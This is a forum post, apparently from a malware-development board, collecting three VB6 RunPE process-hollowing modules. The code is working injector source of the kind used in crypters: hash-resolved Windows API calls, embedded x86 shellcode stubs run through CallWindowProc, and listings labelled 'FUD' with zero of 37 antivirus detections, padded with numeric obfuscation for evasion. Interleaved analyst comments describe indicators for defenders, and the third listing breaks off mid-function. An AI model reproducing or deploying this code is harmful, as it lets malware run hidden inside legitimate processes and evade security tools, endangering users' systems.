
RunPE's CallWindowProcA/W [VB6] Collection

Тема в разделе "Исходные коды", создана пользователем F.I.G.H.T.E.R, 23 дек 2013.

    RunPE's CallWindowProcA/W [VB6] Collection
    Part 1

    Код:
    Option Explicit
    Option Base 0
     
    '---------------------------------------------------------------------------------------
    ' Module    : kRunPe
    ' Author    : Karcrack
    ' Date      : 230710
    ' Purpose  : Shortest way to Run PE from ByteArray
    '---------------------------------------------------------------------------------------
     
    ' Four-byte record holding one Long. SliceLong copies it onto a DWORD_B with
    ' LSet so the same four bytes can be read individually.
    Private Type DWORD_L
        D1                          As Long
    End Type
     
    ' Byte-wise view of a Long (B1 is the first byte in memory). Invoke uses it to
    ' emit 32-bit immediates one byte at a time into the generated stub.
    Private Type DWORD_B
        B1      As Byte:    B2      As Byte
        B3      As Byte:    B4      As Byte
    End Type
     
    'USER32
    ' Declared with a generic signature (a code pointer plus four optional Longs).
    ' This module passes the address of a Byte array as lpCode, so USER32 transfers
    ' control to those bytes. Analyst note: CallWindowProcA/W being the only import
    ' of a VB6 module that also carries opcode arrays is a useful static indicator.
    Private Declare Function CallWindowProcW Lib "USER32" (ByVal lpCode As Long, Optional ByVal lParam1 As Long, Optional ByVal lParam2 As Long, Optional ByVal lParam3 As Long, Optional ByVal lParam4 As Long) As Long
     
    ' Set by Invoke once ASM_gAPIPTR has been filled.
    Private bInitialized_Inv        As Boolean
    ' Receives the 171-byte resolver stub written by Invoke.
    Private ASM_gAPIPTR(170)        As Byte
    ' Scratch buffer that Invoke fills with a per-call stub through PutByte.
    Private ASM_cCODE(255)          As Byte
     
    ' Module names passed as the first argument of Invoke.
    Private Const KERNEL32          As String = "KERNEL32"
    Private Const NTDLL            As String = "NTDLL"
     
    ' RunPE: writes the 32-bit PE image held in bvBuff into a freshly created,
    ' suspended instance of sHost and resumes it, so the buffer's code runs inside
    ' a process that carries the host's name and path. This is the technique
    ' catalogued as process hollowing (MITRE ATT&CK T1055.012).
    '
    ' Parameters:
    '   bvBuff   - raw bytes of the PE file to map.
    '   sHost    - path of the executable started as the container process.
    '   sParams  - optional command line handed to CreateProcessW.
    '   hProcess - receives the process handle of the created host.
    ' Returns False (default) when the MZ or PE signature check fails; otherwise
    ' True. The results of the individual API calls are not inspected.
    '
    ' Defender note: every API is reached through Invoke by hash, so no import
    ' names appear in the binary. Behaviourally the sequence is still visible:
    ' suspended child creation, NtUnmapViewOfSection on the child, a remote
    ' allocation with PAGE_EXECUTE_READWRITE, cross-process writes, then
    ' NtSetContextThread and NtResumeThread. After it runs, the child's in-memory
    ' image no longer matches the file on disk.
    Public Function RunPE(ByRef bvBuff() As Byte, ByVal sHost As String, Optional ByVal sParams As String, Optional ByRef hProcess As Long) As Boolean
        Dim hModuleBase            As Long
        Dim hPE                    As Long
        Dim hSec                    As Long
        Dim ImageBase              As Long
        Dim i                      As Long
        Dim tSTARTUPINFO(16)        As Long
        Dim tPROCESS_INFORMATION(3) As Long
        Dim tCONTEXT(50)            As Long
     
        ' Address of the payload bytes inside this process.
        hModuleBase = VarPtr(bvBuff(0))
     
        ' DOS header must start with "MZ".
        If Not GetNumb(hModuleBase, 2) = &H5A4D Then Exit Function
     
        ' e_lfanew (offset &H3C) gives the offset of the NT headers.
        hPE = hModuleBase + GetNumb(hModuleBase + &H3C)
     
        ' NT headers must start with "PE".
        If Not GetNumb(hPE) = &H4550 Then Exit Function
     
        ' OptionalHeader.ImageBase of a PE32 image (NT headers + &H34).
        ImageBase = GetNumb(hPE + &H34)
     
        ' STARTUPINFO.cb = 68 bytes.
        tSTARTUPINFO(0) = &H44
        'CreateProcessW@KERNEL32
        ' dwCreationFlags = &H4 (CREATE_SUSPENDED): the host never runs its own code.
        Call Invoke(KERNEL32, &H16B3FE88, StrPtr(sHost), StrPtr(sParams), 0, 0, 0, &H4, 0, 0, VarPtr(tSTARTUPINFO(0)), VarPtr(tPROCESS_INFORMATION(0)))
        'NtUnmapViewOfSection@NTDLL
        ' tPROCESS_INFORMATION(0) is hProcess; unmaps whatever sits at the payload's ImageBase.
        Call Invoke(NTDLL, &HF21037D0, tPROCESS_INFORMATION(0), ImageBase)
        'NtAllocateVirtualMemory@NTDLL
        ' Size is SizeOfImage (NT headers + &H50); &H3000 = MEM_COMMIT Or MEM_RESERVE,
        ' &H40 = PAGE_EXECUTE_READWRITE.
        Call Invoke(NTDLL, &HD33BCABD, tPROCESS_INFORMATION(0), VarPtr(ImageBase), 0, VarPtr(GetNumb(hPE + &H50)), &H3000, &H40)
        'NtWriteVirtualMemory@NTDLL
        ' Copies the headers: length is SizeOfHeaders (NT headers + &H54).
        Call Invoke(NTDLL, &HC5108CC2, tPROCESS_INFORMATION(0), ImageBase, VarPtr(bvBuff(0)), GetNumb(hPE + &H54), 0)
     
        ' One pass per section; the count is FileHeader.NumberOfSections (NT headers + 6).
        For i = 0 To GetNumb(hPE + &H6, 2) - 1
            ' Section table starts &HF8 bytes into the NT headers; each entry is &H28 bytes.
            hSec = hPE + &HF8 + (&H28 * i)
     
            'NtWriteVirtualMemory@NTDLL
            ' Destination: ImageBase + VirtualAddress (+&HC). Source: buffer +
            ' PointerToRawData (+&H14). Length: SizeOfRawData (+&H10).
            Call Invoke(NTDLL, &HC5108CC2, tPROCESS_INFORMATION(0), ImageBase + GetNumb(hSec + &HC), hModuleBase + GetNumb(hSec + &H14), GetNumb(hSec + &H10), 0)
        Next i
     
        ' ContextFlags = &H10007 (x86 CONTEXT_FULL).
        tCONTEXT(0) = &H10007
        'NtGetContextThread@NTDLL
        ' tPROCESS_INFORMATION(1) is the handle of the host's primary thread.
        Call Invoke(NTDLL, &HE935E393, tPROCESS_INFORMATION(1), VarPtr(tCONTEXT(0)))
        'NtWriteVirtualMemory@NTDLL
        ' tCONTEXT(41) is byte offset &HA4 (Ebx in the x86 CONTEXT layout); the value
        ' + 8 is written with the new ImageBase. NOTE(review): presumably this is the
        ' PEB ImageBaseAddress field of the suspended process - confirm.
        Call Invoke(NTDLL, &HC5108CC2, tPROCESS_INFORMATION(0), tCONTEXT(41) + &H8, VarPtr(ImageBase), &H4, 0)
     
        ' tCONTEXT(44) is byte offset &HB0 (Eax); it is set to ImageBase +
        ' AddressOfEntryPoint (NT headers + &H28).
        tCONTEXT(44) = ImageBase + GetNumb(hPE + &H28)
     
        'NtSetContextThread@NTDLL
        Call Invoke(NTDLL, &H6935E395, tPROCESS_INFORMATION(1), VarPtr(tCONTEXT(0)))
        'NtResumeThread@NTDLL
        Call Invoke(NTDLL, &HC54A46C8, tPROCESS_INFORMATION(1), 0)
     
        hProcess = tPROCESS_INFORMATION(0)
        RunPE = True
    End Function
     
    ' GetNumb: reads lSize bytes (default 4) at address lPtr and returns them as a Long.
    ' The read is done by asking NtWriteVirtualMemory to copy from lPtr into this
    ' function's own return variable, with -1 as the process handle (the
    ' current-process pseudo handle). Analyst note: this avoids importing a memory
    ' copy routine, so the usual RtlMoveMemory declaration is absent from the module.
    Private Function GetNumb(ByVal lPtr As Long, Optional ByVal lSize As Long = &H4) As Long
        'NtWriteVirtualMemory@NTDLL
        Call Invoke(NTDLL, &HC5108CC2, -1, VarPtr(GetNumb), lPtr, lSize, 0)
    End Function
     
    ' Invoke: calls an exported function identified by a 32-bit hash instead of by name.
    '
    ' Parameters:
    '   sDLL    - module name handed to the resolver stub.
    '   hHash   - hash value identifying the export.
    '   vParams - arguments; each is converted with CLng and pushed as a 32-bit value.
    ' Returns the callee's result, or 0 when the resolver returns no address.
    '
    ' Defender note: the function executes bytes held in ordinary Byte arrays.
    ' NOTE(review): that presumably depends on DEP not being enforced for the
    ' process - confirm. The resolver byte array is a stable signature: the same
    ' 171 bytes occur in the other listings on this page.
    Public Function Invoke(ByVal sDLL As String, ByVal hHash As Long, ParamArray vParams() As Variant) As Long
        Dim vItem                  As Variant
        Dim bsTmp                  As DWORD_B
        Dim lAPI                    As Long
        Dim i                      As Long
        Dim w                      As Long
     
        ' One-time fill of the resolver stub.
        If Not bInitialized_Inv Then
            For i = 0 To 170
                ' Raw x86 bytes. Visible patterns: 64 8B 70 30 (load from fs:[..+30h],
                ' the PEB pointer), C1 CF 0D (ror edi, 0Dh) inside a byte loop, and
                ' 3B 7C 24 20 (compare with a stack argument). This is consistent with
                ' walking the loaded-module list and matching export names by a
                ' rotate-right-13 hash - hedged, confirm by disassembly.
                ASM_gAPIPTR(i) = CByte(Choose(i + 1, &HE8, &H22, &H0, &H0, &H0, &H68, &HA4, &H4E, &HE, &HEC, &H50, &HE8, &H43, &H0, &H0, &H0, &H83, &HC4, &H8, &HFF, &H74, &H24, &H4, &HFF, &HD0, &HFF, &H74, &H24, &H8, &H50, &HE8, &H30, &H0, &H0, &H0, &H83, &HC4, &H8, &HC3, &H56, &H55, &H31, &HC0, &H64, &H8B, &H70, &H30, &H8B, &H76, &HC, &H8B, &H76, &H1C, &H8B, &H6E, &H8, &H8B, &H7E, &H20, &H8B, &H36, &H38, &H47, &H18, &H75, &HF3, &H80, &H3F, &H6B, &H74, &H7, &H80, &H3F, &H4B, &H74, &H2, &HEB, &HE7, &H89, &HE8, &H5D, &H5E, &HC3, &H55, &H52, &H51, _
                                &H53, &H56, &H57, &H8B, &H6C, &H24, &H1C, &H85, &HED, &H74, &H43, &H8B, &H45, &H3C, &H8B, &H54, &H5, &H78, &H1, &HEA, &H8B, &H4A, &H18, &H8B, &H5A, &H20, &H1, &HEB, &HE3, &H30, &H49, &H8B, &H34, &H8B, &H1, &HEE, &H31, &HFF, &H31, &HC0, &HFC, &HAC, &H84, &HC0, &H74, &H7, &HC1, &HCF, &HD, &H1, &HC7, &HEB, &HF4, &H3B, &H7C, &H24, &H20, &H75, &HE1, &H8B, &H5A, &H24, &H1, &HEB, &H66, &H8B, &HC, &H4B, &H8B, &H5A, &H1C, &H1, &HEB, &H8B, &H4, &H8B, &H1, &HE8, &H5F, &H5E, &H5B, &H59, &H5A, &H5D, &HC3))
            Next i
            i = 0
            bInitialized_Inv = True
        End If
     
        ' Run the resolver with the module name and hash; the result is used as the
        ' address of the export.
        lAPI = CallWindowProcW(VarPtr(ASM_gAPIPTR(0)), StrPtr(sDLL), hHash)
     
        If lAPI Then
            ' Arguments are emitted last-to-first so the first one ends up on top of the stack.
            For w = UBound(vParams) To LBound(vParams) Step -1
                bsTmp = SliceLong(CLng(vParams(w)))
                '// PUSH ADDR
                Call PutByte(&H68, i)
                Call PutByte(bsTmp.B1, i):  Call PutByte(bsTmp.B2, i)
                Call PutByte(bsTmp.B3, i):  Call PutByte(bsTmp.B4, i)
            Next w
     
            bsTmp = SliceLong(lAPI)
            '// MOV EAX, ADDR
            Call PutByte(&HB8, i)
            Call PutByte(bsTmp.B1, i):  Call PutByte(bsTmp.B2, i)
            Call PutByte(bsTmp.B3, i):  Call PutByte(bsTmp.B4, i)
            '// CALL EAX
            Call PutByte(&HFF, i):      Call PutByte(&HD0, i)
            '// RET
            Call PutByte(&HC3, i)
     
            ' Execute the stub just written to ASM_cCODE.
            Invoke = CallWindowProcW(VarPtr(ASM_cCODE(0)))
        End If
    End Function
     
    ' PutByte: stores bByte at ASM_cCODE(iCounter) and advances iCounter by one.
    ' iCounter is ByRef, so the caller's write position moves with each call.
    Private Sub PutByte(ByVal bByte As Byte, ByRef iCounter As Long)
        ASM_cCODE(iCounter) = bByte
        iCounter = iCounter + 1
    End Sub
     
    ' SliceLong: returns the four bytes of lLong as a DWORD_B (B1 first in memory).
    ' LSet copies the raw bytes of one user-defined type onto another.
    Private Function SliceLong(ByVal lLong As Long) As DWORD_B
        Dim tL                      As DWORD_L
     
        tL.D1 = lLong
        LSet SliceLong = tL
    End Function
     
     
     
    ' Usage example from the post: reads %WINDIR%\SYSTEM32\calc.exe into a byte
    ' array and passes it to RunPE with notepad.exe as the host process.
    ' Analyst note: the visible effect is a process whose image path is
    ' notepad.exe while the code running in it came from a different file.
    Dim x()    As Byte
        Open Environ$("WINDIR") & "\SYSTEM32\calc.exe" For Binary As #1
            ReDim x(0 To LOF(1) - 1)
            Get #1, , x
        Close #1
        Call RunPE(x, Environ$("WINDIR") & "\SYSTEM32\notepad.exe")
    Код:
    ' ===========================================================================================================================
    ' ===========================================================================================================================
    ' => Autor: M3
    ' => RunPe + Invoke FUD baseado en el JunPE de Jhonjhon_123
    ' => Credits to Jhonjhon_123 | Karcrack | Cobein | Mike D Sutton
    ' => Detecciones : 0 | 37  (Please login or register to view links)
    ' => Flecha : 13|05|2012
    ' => sHost : Ruta al exe
    ' => sBytes: Bytes a ejecutar
    ' ===========================================================================================================================
    ' ===========================================================================================================================
    Declare  Function CallThunk8 Lib "user32" Alias "CallWindowProcA" (ByRef cCode  As Currency, Optional ByVal lP1 As Long, Optional ByVal lP2 As Long,  Optional ByVal lP3 As Long, Optional ByVal lP4 As Long) As Long
    Declare  Function ExeThunk Lib "user32" Alias "CallWindowProcA" (ByVal Address  As Any, Optional ByVal Param1 As Long, Optional ByVal Param2 As Long,  Optional ByVal Param3 As Long, Optional ByVal Param4 As Long) As Long
    Declare  Function sMulDiv Lib "kernel32" Alias "MulDiv" (ByRef a As Any,  Optional ByVal b As Long = 1, Optional ByVal c As Long = 1) As Long
    Private sVALUE                        As Byte
    Private sMEMORY(40)                    As Byte
    Private ASM_GETAPIPTR(170)            As Byte
    Private ASM_CALLCODE(255)              As Byte
    Private IMAGE_DOS_HEADER(65)          As Byte
    Private IMAGE_NT_HEADERS(256)          As Byte
    Private IMAGE_SECTION_HEADER(60)      As Byte
    Private PROCESS_INFORMATION(44)        As Byte
    Private tCONTEXT(210)                  As Byte
    Private STARTUPINFO(16)                As Long
    Private sParams                        As Long
    Private sImageBase                    As Long
    Private sProcess                      As Long
    Private sThread                        As Long
    Private SizeOfImage                    As Long
    Private SizeOfHeaders                  As Long
    Private sEntryPoint                    As Long
    Private sVirtualAddress                As Long
    Private sRawData                      As Long
    Private sRawDataPoint                  As Long
    Private sEbx                          As Long
    Private D                              As Long
    Private Y                              As Long
    Private vItem                          As Variant
    Private sSection                      As Integer
     
     
    ' sInject: process-hollowing routine (MITRE ATT&CK T1055.012). It parses the
    ' PE headers of sBytes, starts sHost suspended, unmaps the host image, writes
    ' the payload's headers and sections into the host and resumes its thread.
    '
    ' Parameters:
    '   sHost  - path of the executable started as the container process.
    '   sBytes - raw bytes of the PE file to map.
    ' No value is assigned to the function name, and no call result is checked.
    '
    ' Analyst notes:
    '  * Numeric literals are written as sums or string conversions (CLng("0"),
    '    &H1 + &H3 = 4, &H1 + &H3 + &H2 = 6, &H1 + &H4 + &H3 = 8, 200 + 48 = 248).
    '    The module header advertises a low detection count, so this is presumably
    '    meant to vary the compiled byte pattern; normalise before matching.
    '  * API names are passed to Invoke as plain strings here, so they are visible
    '    in the binary's string table.
    '  * Behavioural sequence to alert on: suspended child creation,
    '    NtUnmapViewOfSection, VirtualAllocEx with PAGE_EXECUTE_READWRITE (&H40),
    '    NtWriteVirtualMemory, NtSetContextThread, NtResumeThread.
    Public Function sInject(ByVal sHost As String, ByRef sBytes() As Byte)
     
     
    ' Fills sMEMORY with a small x86 routine; the bytes include F3 A5 (rep movsd)
    ' and F3 A4 (rep movsb), i.e. a memory-copy loop. MoveMemory executes it.
    For  Each vItem In Array(&H56, &H8B, &HEC, &H57, &H60,  &H60, &HFC, &H8B, &H75, &HC, &H8B, &H7D,  &H8, &H8B, &H4D, &H10, &HC1, _
    &HE9, &H2,  &HF3, &HA5, &H8B, &H4D, &H10, &H83, &HE1,  &H3, &HF3, &HA4, &H61, &H5F, &H5E, &HC9,  &HC2, &H10, &H0, &H10)
     
     
    sMEMORY(Y) = vItem
     
    Y = Y + 1
     
    ' 248 = &HF8, the offset from the NT headers to the first section header (PE32).
    sVALUE = 200 + 48
     
    Next
     
     
    Call MoveMemory(sMulDiv(STARTUPINFO(0)), sMulDiv(72), CLng("0"))
     
    ' Source value is &H10007 (x86 CONTEXT_FULL), copied to the start of tCONTEXT.
    Call MoveMemory(sMulDiv(tCONTEXT(CLng("0"))), sMulDiv(&H10007), &H1 + &H4 + &H3)
     
    ' Local copy of the DOS header.
    Call MoveMemory(sMulDiv(IMAGE_DOS_HEADER(CLng("0"))), sMulDiv(sBytes(CLng("0"))), 72)
     
    ' Offset 60 (&H3C) is e_lfanew; sParams is reused to hold the NT-header offset.
    Call MoveMemory(sMulDiv(sParams), sMulDiv(IMAGE_DOS_HEADER(60)), &H1 + &H3 + &H2)
     
    ' Local copy of the NT headers.
    Call MoveMemory(sMulDiv(IMAGE_NT_HEADERS(CLng("0"))), sMulDiv(sBytes(sParams)), 256)
     
    ' Offset 52: OptionalHeader.ImageBase.
    Call MoveMemory(sMulDiv(sImageBase), sMulDiv(IMAGE_NT_HEADERS(52)), &H1 + &H3 + &H2)
     
    ' Offset 80: SizeOfImage.
    Call MoveMemory(sMulDiv(SizeOfImage), sMulDiv(IMAGE_NT_HEADERS(80)), &H1 + &H4 + &H3)
     
    ' Offset 84: SizeOfHeaders.
    Call MoveMemory(sMulDiv(SizeOfHeaders), sMulDiv(IMAGE_NT_HEADERS(84)), &H1 + &H4 + &H3)
     
    ' Offset 40: AddressOfEntryPoint.
    Call MoveMemory(sMulDiv(sEntryPoint), sMulDiv(IMAGE_NT_HEADERS(40)), &H1 + &H3 + &H2)
     
    ' Offset 6: FileHeader.NumberOfSections.
    Call MoveMemory(sMulDiv(sSection), sMulDiv(IMAGE_NT_HEADERS(6)), &H2)
     
    ' sHost is passed as the command line; dwCreationFlags = &H4 (CREATE_SUSPENDED).
    Call  Invoke("KERNEL32", "CreateProcessW", 0, StrPtr(sHost), 0, 0, &H1,  &H4, 0, 0, sMulDiv(STARTUPINFO(CLng("0"))),  sMulDiv(PROCESS_INFORMATION(CLng("0"))))
     
    ' PROCESS_INFORMATION: hProcess at offset 0, hThread at offset 4.
    Call MoveMemory(sMulDiv(sProcess), sMulDiv(PROCESS_INFORMATION(CLng("0"))), &H1 + &H3)
     
    Call MoveMemory(sMulDiv(sThread), sMulDiv(PROCESS_INFORMATION(4)), &H1 + &H3)
     
    Call Invoke("NTDLL", "NtUnmapViewOfSection", sProcess, sImageBase)
     
    ' &H3000 = MEM_COMMIT Or MEM_RESERVE, &H40 = PAGE_EXECUTE_READWRITE.
    Call Invoke("KERNEL32", "VirtualAllocEx", sProcess, sImageBase, SizeOfImage, &H3000&, &H40)
     
    ' Headers first.
    Call Invoke("NTDLL", "NtWriteVirtualMemory", sProcess, sImageBase, sMulDiv(sBytes(CLng("0"))), SizeOfHeaders, CLng("0"))
     
    ' Then one write per section header (40 bytes each).
    For D = 0 To sSection - 1
     
    Call MoveMemory(sMulDiv(IMAGE_SECTION_HEADER(CLng("0"))), sMulDiv(sBytes(sParams + sVALUE + 40 * D)), &H40)
     
    ' Offset 12: VirtualAddress.
    Call MoveMemory(sMulDiv(sVirtualAddress), sMulDiv(IMAGE_SECTION_HEADER(12)), &H1 + &H3 + &H2)
     
    ' Offset 16 is SizeOfRawData and offset 20 is PointerToRawData; the variable
    ' names are the other way round from the fields they receive.
    Call MoveMemory(sMulDiv(sRawDataPoint), sMulDiv(IMAGE_SECTION_HEADER(16)), &H1 + &H4 + &H3)
     
    Call MoveMemory(sMulDiv(sRawData), sMulDiv(IMAGE_SECTION_HEADER(20)), &H1 + &H3)
     
    Call  Invoke("NTDLL", "NtWriteVirtualMemory", sProcess, sImageBase +  sVirtualAddress, sMulDiv(sBytes(sRawData)), sRawDataPoint, CLng("0"))
     
    Next
     
    Call Invoke("NTDLL", "NtGetContextThread", sThread, sMulDiv(tCONTEXT(CLng("0"))))
     
    Call  Invoke("NTDLL", "NtWriteVirtualMemory", sProcess, sEbx + &H4 +  &H1 + &H3, sMulDiv(sVirtualAddress), &H1 + &H3 +  &H2, CLng("0"))
     
    ' Byte offset 176 (&HB0) is Eax in the x86 CONTEXT layout; it receives
    ' sImageBase + sEntryPoint.
    Call MoveMemory(sMulDiv(tCONTEXT(176)), sMulDiv(sImageBase + sEntryPoint), &H1 + &H3)
     
    Call MoveMemory(sMulDiv(sEntryPoint), sMulDiv(tCONTEXT(176)), &H1 + &H3)
     
    Call Invoke("NTDLL", "NtSetContextThread", sThread, sMulDiv(tCONTEXT(CLng("0"))))
     
    Call Invoke("NTDLL", "NtResumeThread", sThread, CLng("0"))
     
    End Function
     
     
    ' MoveMemory: copies cBytes bytes from lpSource to lpDest by executing the
    ' routine that sInject stored in sMEMORY. ExeThunk is CallWindowProcA under an
    ' alias, so no memory-copy API appears in the module's declarations.
    ' sMulDiv is MulDiv declared with a ByRef first argument and defaults of 1;
    ' presumably it is used here only to obtain the argument's address.
    Public Sub MoveMemory(ByVal lpDest As Long, ByVal lpSource As Long, ByVal cBytes As Long)
     
        ExeThunk sMulDiv(sMEMORY(0)), lpDest, lpSource, cBytes, CLng("0")
     
    End Sub
     
     
     
    ' Invoke: calls the export named hHash in module sDLL without a Declare statement.
    ' The name is hashed at run time by gHash, resolved by the stub from
    ' THUNK_GETAPIPTR, and called through a stub assembled as a hex string.
    '
    ' Parameters:
    '   sDLL    - module name handed to the resolver stub.
    '   hHash   - export name (a String in this variant).
    '   vParams - arguments, each emitted as a 32-bit push.
    ' Returns the callee's result. On Error Resume Next suppresses any VB
    ' run-time error raised while building the stub.
    Function Invoke(ByVal sDLL As String, hHash As String, ParamArray vParams() As Variant) As Long
     
    On Error Resume Next
    Dim vItem                      As Variant
    Dim sThunk                      As String
     
    ' Load the resolver bytes into ASM_GETAPIPTR.
    Call PutThunk(THUNK_GETAPIPTR, ASM_GETAPIPTR)
     
    ' "68" is PUSH imm32; prepending reverses the order so the first argument is
    ' pushed last.
    For Each vItem In vParams
    sThunk = "68" & GetLng(vItem) & sThunk
    Next vItem
     
    ' "B8" + address is MOV EAX, imm32; "FFD0" is CALL EAX; "C3" is RET.
    Call PutThunk(sThunk & "B8" & GetLng(ExeThunk(VarPtr(ASM_GETAPIPTR(CLng("0"))), _
    StrPtr(sDLL), gHash(hHash))) & "FFD0C3" & sThunk, ASM_CALLCODE)
     
    ' Execute the assembled stub.
    Invoke = ExeThunk(VarPtr(ASM_CALLCODE(CLng("0"))))
     
     
    End Function
     
    ' gHash: computes the 32-bit hash of strHash that the resolver stub compares
    ' against export names. For each character the running value is passed through
    ' CallThunk8 and the character code is added.
    ' CallThunk8 is CallWindowProcA with its first parameter declared ByRef As
    ' Currency, so the 8-byte Currency literal below is executed as code.
    ' NOTE(review): the literal appears to encode a rotate-right-by-13 of the
    ' second argument - confirm by disassembly.
    ' The result is built as an "&H........" string and coerced to the Long return type.
    Private Function gHash(strHash) As Long
    On Error Resume Next
     
    Dim i          As Long
    Dim lResult    As Long
     
    For i = 1 To Len(strHash)
    lResult = CallThunk8(-439163333029263.6533@, lResult)
    lResult = lResult + Asc(Mid(strHash, i, 1))
    Next i
    gHash = "&H" & String(8 - Len(Hex(lResult)), "0") & Hex(lResult)
     
     
    End Function
     
    ' GetLng: returns lLng as eight hex digits with its four bytes in reversed
    ' order, i.e. the order in which a 32-bit immediate is stored in x86 code.
    ' The top bit is handled separately (the &H7F mask and the following If) so the
    ' multiplication cannot overflow a signed Long.
    Private Function GetLng(ByVal lLng As Long) As String
    On Error Resume Next
    Dim lTMP                        As Long
    lTMP  = (((lLng And &HFF000000) \ &H1000000) And &HFF&) Or  ((lLng And &HFF0000) \ &H100&) Or ((lLng And  &HFF00&) * &H100&) Or ((lLng And &H7F&) *  &H1000000) ' by Mike D Sutton
    If (lLng And &H80&) Then lTMP = lTMP Or &H80000000
    GetLng = String(8 - Len(Hex(lTMP)), "0") & Hex(lTMP)
    End Function
     
    ' PutThunk: decodes the hex string sThunk two characters at a time and stores
    ' the resulting bytes in bvRet starting at index 0.
    ' On Error Resume Next means a string longer than the array is silently cut off
    ' at the array bound rather than raising an error.
    Private Sub PutThunk(ByVal sThunk As String, ByRef bvRet() As Byte)
    On Error Resume Next
    Dim i                          As Long
    For i = 0 To Len(sThunk) - 1 Step 2
    bvRet((i / 2)) = ("&H" & Mid(sThunk, i + 1, 2))
    Next i
    End Sub
     
    ' THUNK_GETAPIPTR: returns the resolver stub as one hex string, assembled from
    ' six fragments. Visible patterns: 648B7030 (load from fs:[..+30h], the PEB
    ' pointer) and C1CF0D (ror edi, 0Dh), consistent with locating a loaded module
    ' and matching export names by hash - hedged, confirm by disassembly.
    ' Analyst note: the string is stored in pieces, so signatures should match on
    ' the individual fragments or on the decoded bytes.
    Function THUNK_GETAPIPTR() As String
    THUNK_GETAPIPTR = "E82200000068A44E0EEC50E84300000083C408FF742404FFD0FF7424"
    THUNK_GETAPIPTR = THUNK_GETAPIPTR & "0850E83000000083C408C3565531C0648B70308B760C8B761C8B6E08"
    THUNK_GETAPIPTR = THUNK_GETAPIPTR & "8B7E208B3638471875F3803F6B7407803F4B7402EBE789E85D5EC355"
    THUNK_GETAPIPTR = THUNK_GETAPIPTR & "52515356578B6C241C85ED74438B453C8B54057801EA8B4A188B5A20"
    THUNK_GETAPIPTR = THUNK_GETAPIPTR & "01EBE330498B348B01EE31FF31C0FCAC84C07407C1CF0D01C7EBF43B"
    THUNK_GETAPIPTR = THUNK_GETAPIPTR & "7C242075E18B5A2401EB668B0C4B8B5A1C01EB8B048B01E85F5E5B595A5DC3"
    End Function
    Код:
    ' ===========================================================================================================================
    ' ===========================================================================================================================
    ' => Autor: M3
    ' => RunPe + HashInvoke FUD baseado en el JunPE de Jhonjhon_123
    ' => Credits to Jhonjhon_123 | Karcrack | Cobein | Mike D Sutton
    ' => Detecciones : 0 | 37  (Please login or register to view links)
    ' => Flecha : 03|06|2012
    ' => sHost : Ruta al exe
    ' => sBytes: Bytes a ejecutar
    ' ===========================================================================================================================
    ' ===========================================================================================================================
    Declare  Function CallWindowProcA Lib "USER32" (ByVal lpCode As Long, Optional  ByVal lParam1 As Long, Optional ByVal lParam2 As Long, Optional ByVal  lParam3 As Long, Optional ByVal lParam4 As Long) As Long
    Private sVALUE                        As Byte
    Private sMEMORY(40)                    As Byte
    Private ASM_GETAPIPTR(170)            As Byte
    Private ASM_CALLCODE(255)              As Byte
    Private IMAGE_DOS_HEADER(65)          As Byte
    Private IMAGE_NT_HEADERS(256)          As Byte
    Private IMAGE_SECTION_HEADER(60)      As Byte
    Private PROCESS_INFORMATION(44)        As Byte
    Private tCONTEXT(210)                  As Byte
    Private STARTUPINFO(16)                As Long
    Private sParams                        As Long
    Private sImageBase                    As Long
    Private sProcess                      As Long
    Private sThread                        As Long
    Private SizeOfImage                    As Long
    Private SizeOfHeaders                  As Long
    Private sEntryPoint                    As Long
    Private sVirtualAddress                As Long
    Private sRawData                      As Long
    Private sRawDataPoint                  As Long
    Private sEbx                          As Long
    Private D                              As Long
    Private Y                              As Long
    Private vItem                          As Variant
    Private sSection                      As Integer
    Private Type DWORD_L
        D1      As Long
    End Type
    Private Type DWORD_B
        B1      As Byte
        B2      As Byte
        B3      As Byte
        B4      As Byte
    End Type
     
     
    ' sInject: process-hollowing routine (MITRE ATT&CK T1055.012), hash-resolved
    ' variant. It parses the PE headers of sBytes, starts sHost suspended, unmaps
    ' the host image, writes the payload's headers and sections into the host and
    ' resumes its thread.
    '
    ' Parameters:
    '   sHost  - path of the executable started as the container process.
    '   sBytes - raw bytes of the PE file to map.
    ' No value is assigned to the function name, and no call result is checked.
    '
    ' Analyst notes:
    '  * Exports are identified only by 32-bit hashes. Six of the values are
    '    labelled in the first listing on this page: &H16B3FE88 CreateProcessW,
    '    &HF21037D0 NtUnmapViewOfSection, &HC5108CC2 NtWriteVirtualMemory,
    '    &HE935E393 NtGetContextThread, &H6935E395 NtSetContextThread,
    '    &HC54A46C8 NtResumeThread. &H6E1A959C is unlabelled; it sits where the
    '    string-based variant calls VirtualAllocEx - presumably the same API.
    '  * Numeric literals are split into sums or built from strings (CLng("0"),
    '    &H1 + &H3 = 4, &H1 + &H3 + &H2 = 6, &H1 + &H4 + &H3 = 8, 200 + 48 = 248);
    '    normalise before signature matching.
    '  * The behavioural sequence (suspended child, unmap, RWX allocation, remote
    '    writes, thread-context change, resume) is unchanged by the hashing.
    Public Function sInject(ByVal sHost As String, ByRef sBytes() As Byte)
     
     
    ' Fills sMEMORY with a small x86 routine; the bytes include F3 A5 (rep movsd)
    ' and F3 A4 (rep movsb), i.e. a memory-copy loop. MoveMemory executes it.
    For  Each vItem In Array(&H56, &H8B, &HEC, &H57, &H60,  &H60, &HFC, &H8B, &H75, &HC, &H8B, &H7D,  &H8, &H8B, &H4D, _
    &H10, &HC1, &HE9, &H2,  &HF3, &HA5, &H8B, &H4D, &H10, &H83, &HE1,  &H3, &HF3, &HA4, &H61, &H5F, &H5E, &HC9, _
    &HC2, &H10, &H0, &H10)
     
     
    sMEMORY(Y) = vItem
     
    Y = Y + 1
     
    ' 248 = &HF8, the offset from the NT headers to the first section header (PE32).
    sVALUE = 200 + 48
     
    Next
     
     
    Call MoveMemory(Varptr(STARTUPINFO(0)), Varptr(72), CLng("0"))
     
    ' Source value is &H10007 (x86 CONTEXT_FULL), copied to the start of tCONTEXT.
    Call MoveMemory(Varptr(tCONTEXT(CLng("0"))), Varptr(&H10007), &H1 + &H4 + &H3)
     
    ' Local copy of the DOS header.
    Call MoveMemory(Varptr(IMAGE_DOS_HEADER(CLng("0"))), Varptr(sBytes(CLng("0"))), 72)
     
    ' Offset 60 (&H3C) is e_lfanew; sParams is reused to hold the NT-header offset.
    Call MoveMemory(Varptr(sParams), Varptr(IMAGE_DOS_HEADER(60)), &H1 + &H3 + &H2)
     
    ' Local copy of the NT headers.
    Call MoveMemory(Varptr(IMAGE_NT_HEADERS(CLng("0"))), Varptr(sBytes(sParams)), 256)
     
    ' Offset 52: OptionalHeader.ImageBase.
